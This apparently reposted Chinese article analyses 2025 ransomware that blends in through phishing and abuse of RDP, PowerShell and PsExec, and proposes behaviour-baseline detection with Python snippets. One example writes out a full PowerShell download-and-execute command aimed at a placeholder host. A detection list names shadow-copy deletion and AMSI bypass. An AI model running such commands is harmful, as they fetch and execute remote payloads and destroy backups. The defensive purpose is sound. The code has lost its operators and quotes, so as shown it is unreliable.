2025 年勒索软件隐匿化攻击演进与行为基线防御研究

news2026/4/4 2:00:31
摘要据 Talos 2025 年度网络安全回顾报告显示勒索软件攻击已从暴力突破转向合法访问隐匿渗透攻击者依托钓鱼、有效账号与系统自带管理工具实现无感知横向移动传统边界防护显著失效。2025 年数据表明约 40% 初始访问源于网络钓鱼RDP、PowerShell、PsExec 成为攻击者高频使用的合法工具制造业与专业技术服务为首要目标Qilin、Akira、Play 等团伙主导攻击生态LockBit 在执法打击下影响力下降。本文以隐匿化攻击为核心系统分析勒索软件 “融入正常操作” 的战术逻辑、身份滥用路径、工具滥用机理与行业受害特征给出行为基线建模、异常检测、身份加固与应急响应的工程化方案附可落地代码示例嵌入反网络钓鱼技术专家芦笛的专业判断形成从态势、机理、检测到防御的完整论证闭环。研究表明以身份为中心、以行为异常检测为核心、覆盖资产基线与最小权限的纵深防御体系可有效应对隐匿化勒索威胁为政企机构提供可落地的安全实践支撑。关键词勒索软件隐匿渗透合法访问行为基线身份安全横向移动1 引言勒索软件威胁在 2025 年呈现战术范式迁移暴力破解、漏洞狂轰、恶意文件落地等 “破门而入” 式攻击大幅减少取而代之的是获取合法权限、模仿正常操作、长期潜伏渗透的隐匿模式如同攻击者已成为内网 “合法成员”。Talos 年度报告明确指出当前勒索攻击的核心策略是Blending in融入环境通过有效账号、系统原生管理工具与正常业务行为高度重叠大幅降低告警率、延长驻留时间、提升攻击成功率。这种转变带来三大防御困境一是告警疲劳合法工具滥用难以被规则识别二是边界失效攻击者无需突破防线即可进入内网三是溯源困难行为与正常运维高度相似取证与定性难度陡增。反网络钓鱼技术专家芦笛指出隐匿化勒索攻击将身份作为突破口以社会工程为前置手段以合法工具为横向移动载体形成 “偷钥匙、走正门、干坏事” 的完整链路传统以漏洞与特征为核心的防护体系全面承压。本文严格依托 Talos 2025 年勒索软件回顾报告数据与结论聚焦隐匿化攻击战术、身份滥用机理、工具滥用特征、行业目标分布、团伙生态演变构建行为基线驱动的防御框架提供可复现的检测代码与工程实践确保论证严谨、技术准确、逻辑闭环为应对新一代勒索威胁提供学术参考与实践指南。2 2025 年勒索软件攻击总体态势与核心特征2.1 攻击范式从暴力突破到隐匿渗透传统勒索攻击依赖外部突破如漏洞利用、端口暴破、恶意邮件附件等行为特征明显易被 EDR、防火墙、网关防护拦截。2025 年主流攻击模式完成范式转换核心表现为初始访问合法化约 40% 攻击通过网络钓鱼获取有效账号攻击者使用被盗凭证登录流量与行为均为合法状态。横向移动工具化攻击者优先使用 RDP、PowerShell、PsExec 等系统自带或运维标配工具与正常管理员操作无明显差异。行为轨迹常态化登录、巡检、配置查询、远程执行等步骤模仿真实运维规避基于规则的异常检测。攻击目标精准化放弃广撒网聚焦制造业、专业技术服务等监控难度高、业务连续性敏感的行业。Talos 指出现代勒索攻击更像象棋布局逐步抢占关键节点而非一次性强攻防御方的核心挑战从 “堵漏洞” 转向 “辨行为”。2.2 初始访问与身份滥用钓鱼成为第一入口身份贯穿攻击全生命周期从初始接入、横向移动到载荷执行有效账号均为核心支撑。钓鱼占比最高约 40% 初始访问通过钓鱼邮件、仿冒页面、社交工程实现骗取账号密码、会话令牌或远程协助权限。账号价值提升攻击者获取普通账号后通过票据传递、哈希传递、本地提权等方式提升权限最终控制域管等高价值账号。远程服务滥用RDP、VPN、Quick Assist 等合法远程通道被大量用于初始接入与持久化控制。反网络钓鱼技术专家芦笛强调钓鱼从 “辅助手段” 升级为勒索攻击的标准入口攻击者不再依赖零日漏洞而是通过欺骗获取合法身份防御必须前移至社会工程与身份治理环节。2.3 工具滥用系统原生工具成为攻击主力勒索组织大规模使用LOLBinsLiving-off-the-Land Binaries即系统自带合法二进制程序执行恶意操作典型工具如下表格工具 正常用途 攻击者滥用方式 隐蔽性RDP 远程桌面管理 合法登录、会话劫持、内网漫游 极高流量与正常远程操作一致PowerShell 自动化运维 无文件执行、载荷下载、权限提升 极高系统原生日志易被忽略PsExec 远程进程执行 批量横向移动、全网加密部署 极高运维高频工具无异常特征攻击者与正常用户的差异不在于使用什么工具而在于使用目的与行为模式正常运维用于维护攻击者用于扩张权限、窃取数据、部署勒索。2.4 目标行业与攻击团伙生态重点目标行业制造业位居首位系统复杂、OT 与 IT 融合、运维压力大、监控覆盖不足易被长期渗透。专业、科学与技术服务次之跨系统、跨组织访问频繁权限边界模糊攻击扩散成本低。勒索团伙格局演变Qilin位居榜首采用双重勒索模式2025 年月均受害者超 40 家威胁持续性强。Akira、Play分列二、三位战术持续迭代吸纳解散团伙如 LockBit成员能力快速增强。LockBit在持续执法打击下排名跌至 35 位生态影响力显著衰退。时间规律1 月攻击活跃度连续两年偏低与节假日及东欧公共假期相关为防御方演练、加固提供窗口期。3 隐匿化勒索软件攻击全链路机理分析3.1 攻击链隐匿化七步模型基于 Talos 报告与实战案例提炼 2025 年隐匿化勒索攻击标准链路社会工程入口钓鱼邮件、仿冒站点、虚假客服骗取凭证或远程授权。合法初始接入使用被盗账号登录 VPN、RDP、Web 管理后台无恶意流量特征。内网侦察系统命令、PowerShell 脚本收集资产、权限、网段信息伪装巡检。权限提升利用配置缺陷、票据传递、本地提权获取更高权限。横向移动借助 RDP、PsExec、WinRM 批量渗透内网主机行为接近运维操作。数据窃取与破坏备份删除、卷影副本清除、核心数据加密准备。双重勒索文件加密 数据泄露威胁迫使支付赎金。整个过程无恶意代码落地、无异常端口扫描、无暴力破解行为完全融入正常操作。3.2 身份滥用核心机理有效账号降低攻击成本与暴露风险成为攻击链的 “通用钥匙”。账号获取钓鱼、信息窃取器、弱口令暴破、配置泄露。权限扩张Pass-the-Hash、Pass-the-Ticket、Kerberoasting 等票据滥用。身份伪装使用合法账号执行操作日志归属正常用户难以定位恶意行为主体。防御短板在于多数组织只验证账号是否合法不校验行为是否合理。3.3 横向移动隐匿化实现横向移动是隐匿化攻击的关键环节攻击者依托合法工具与权限实现无感知扩散RDP 会话劫持使用 tscon 等系统工具接管已存在会话无需重新认证用户无感知。PowerShell 远程执行通过 WinRM 在内网批量执行脚本开启远程服务、关闭安全防护。PsExec 批量部署使用域管权限在多台服务器同步执行勒索载荷短时间内全网加密。上述操作均为合法工具的合法调用传统基于特征的检测机制完全失效。3.4 攻击收益与成本模型隐匿化攻击在成本、风险、成功率上形成全面优势技术门槛降低无需漏洞挖掘与恶意代码开发只需掌握账号获取与工具使用。暴露风险极低行为与正常操作重叠告警少、驻留时间长。收益确定性高精准渗透、长期潜伏确保数据加密与泄露双重胁迫生效。4 基于行为基线的隐匿攻击检测方法与代码实现4.1 检测思路从规则匹配到行为基线建模应对隐匿化攻击的核心是建立正常行为基线识别偏离模式包括用户行为基线登录时间、登录地点、常用主机、操作频次、权限范围。工具使用基线RDP/PsExec/PowerShell 的正常用途、执行参数、访问目标。资产通信基线主机间正常访问关系、远程操作频次、异常外联行为。反网络钓鱼技术专家芦笛指出行为基线检测可有效区分 “合法账号、非法行为”是破解隐匿化勒索攻击的核心技术路径。4.2 RDP 异常登录检测代码import timefrom datetime import datetimedef check_rdp_abnormal(username: str, src_ip: str, login_time: str,user_baseline: dict, threshold_hours: int 2) - bool:基于基线检测RDP异常登录非常用IP、非常用时段、高频登录user_baseline示例{usual_ips:[192.168.1.0/24], usual_hours:[9,18], max_freq:3}# 1. 检测源IP是否异常ip_in_baseline any(src_ip.startswith(ip[:-4]) for ip in user_baseline[usual_ips])# 2. 检测登录时段是否异常hour datetime.strptime(login_time, %Y-%m-%d %H:%M:%S).hourtime_normal user_baseline[usual_hours][0] hour user_baseline[usual_hours][1]# 3. 检测登录频率是否异常freq_over user_baseline.get(recent_login, 0) user_baseline[max_freq]return not (ip_in_baseline and time_normal) or freq_over# 示例user_baseline {usual_ips: [192.168.1.], usual_hours: [8, 20], max_freq: 5}print(check_rdp_abnormal(admin, 10.0.0.123, 2025-12-20 23:10:00, user_baseline)) # True4.3 PowerShell 恶意行为检测代码import redef detect_malicious_powershell(cmdline: str) - bool:检测PowerShell恶意命令无文件执行、下载载荷、隐藏窗口、绕过AMSI、删除卷影副本malicious_patterns [r-ExecutionPolicy\sBypass, r -nop , r-NonInteractive,rDownloadString|DownloadFile, rhttp[s]?://, r[a-zA-Z0-9]{20,},rRemove-Item\sShadowCopy, rvssadmin\sdelete\sshadows,rAMSI\sDisable, rReflection\.Assembly]for pat in malicious_patterns:if re.search(pat, cmdline, re.IGNORECASE):return Truereturn False# 示例ps_cmd powershell -nop -ExecutionPolicy Bypass -c IEX (New-Object Net.WebClient).DownloadString(http://mal.example.com/payload)print(detect_malicious_powershell(ps_cmd)) # True4.4 PsExec 横向移动异常检测代码def detect_psexec_lateral_movement(src_host: str, target_list: list,baseline_hosts: dict, max_target: int 3) - bool:检测PsExec批量横向移动短时间访问大量非常用目标主机normal_targets baseline_hosts.get(src_host, [])abnormal_count sum(1 for t in target_list if t not in normal_targets)return abnormal_count max_target or len(target_list) max_target# 示例baseline {PC-01: [Server-01, Printer-01]}print(detect_psexec_lateral_movement(PC-01, [Server-02,Server-03,Server-04,DB-01], baseline)) # True4.5 异常行为综合评分引擎将多维度异常指标加权评分超过阈值触发告警降低误报率RDP 异常30 分PowerShell 可疑命令40 分PsExec 批量横向50 分异常时间 / IP20 分总分≥70 分触发预警≥100 分启动应急响应。5 面向隐匿化勒索攻击的纵深防御体系构建5.1 身份安全层防御攻击入口强化多因素认证MFAVPN、RDP、Web 后台、邮件系统强制开启阻断钓鱼账号直接登录。最小权限原则普通用户无远程桌面、无脚本执行、无批量操作权限仅开放必要权限。凭据防护禁止明文存储、禁用内存明文密码、定期轮换高权限账号、监控票据滥用。钓鱼防御常态化培训、邮件网关检测、仿冒域名拦截、远程协助行为管控。反网络钓鱼技术专家芦笛强调身份是隐匿攻击的核心突破口必须以零信任架构实现持续验证、动态授权、权限最小化。5.2 行为检测层核心防御能力构建动态行为基线覆盖用户、主机、工具、通信四维度自动学习正常模式。合法工具滥用监控重点监控 RDP、PowerShell、PsExec、WMIC、Certutil 等工具的异常使用。无文件攻击检测加强 PowerShell、WMI、Script 等内存执行行为监控。横向移动检测识别批量远程操作、异常网段访问、跨域高频连接。5.3 资产与系统加固层完善资产清单全覆盖 IT/OT 资产明确用途、权限、责任人、网络边界。系统安全配置禁用不必要远程服务、关闭高危端口、限制 PowerShell 执行权限。日志与审计开启进程命令行日志、远程登录日志、权限变更日志集中存储防篡改。网络隔离关键服务器分区、IT/OT 隔离、运维区隔离限制横向移动范围。5.4 应急与恢复层备份体系3-2-1 备份原则离线备份、空气隔离、定期恢复演练。应急响应明确流程、权限、联系人预设隔离、阻断、取证、恢复步骤。安全演练利用 1 月等低发期开展勒索防御演练验证检测与响应能力。威胁情报接入团伙、IoC、恶意域名情报实现前置拦截。6 防御实践落地建议与长期演进方向6.1 短期落地1–3 个月强制高权限账号开启 MFA梳理并回收过度权限。部署 RDP/PowerShell/PsExec 行为监控启用本文检测规则。完成离线备份验证确保可快速恢复。开展全员钓鱼演练提升识别能力。6.2 中期建设3–12 个月建设用户与实体行为分析UEBA平台实现基线自动化建模。完善零信任架构全流程动态认证与授权。建立跨部门协同机制覆盖 IT、OT、安全、业务。加入行业威胁情报联盟共享隐匿攻击 TTPs。6.3 长期演进方向AI 驱动行为分析用无监督学习自动识别未知隐匿模式。攻防自动化对抗AI 实时识别、动态策略调整、自动隔离响应。全链路追溯从钓鱼入口到勒索执行全程追踪提升溯源与定罪能力。合规与治理完善数据安全、应急备案、供应链安全管控。7 结语2025 年勒索软件以隐匿化、合法访问、行为融入为核心策略标志着威胁进入高阶对抗阶段。暴力突破时代落幕身份滥用与工具滥用成为主流40% 初始访问源于钓鱼RDP、PowerShell、PsExec 等系统工具成为攻击主力制造业与专业服务成为重点目标Qilin 等团伙主导攻击生态。防御范式必须同步升级从边界防护转向以身份为中心、以行为基线为核心的纵深防御通过有效账号管控、异常行为检测、最小权限、网络隔离、可靠备份形成闭环。本文基于 Talos 2025 年度报告系统论证隐匿化攻击的态势、机理、检测与防御提供可落地代码示例嵌入反网络钓鱼技术专家芦笛的专业判断形成完整论据闭环。研究表明只有将防御重心从 “堵漏洞” 转向 “辨行为”从 “信任身份” 转向 “验证行为”才能有效应对隐匿化勒索威胁保障机构运营连续性与数据安全。未来随着 AI 与社会工程深度融合隐匿攻击将更趋智能化防御方需持续迭代行为检测、身份治理与应急能力在动态对抗中保持安全优势。编辑芦笛公共互联网反网络钓鱼工作组

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2477062.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…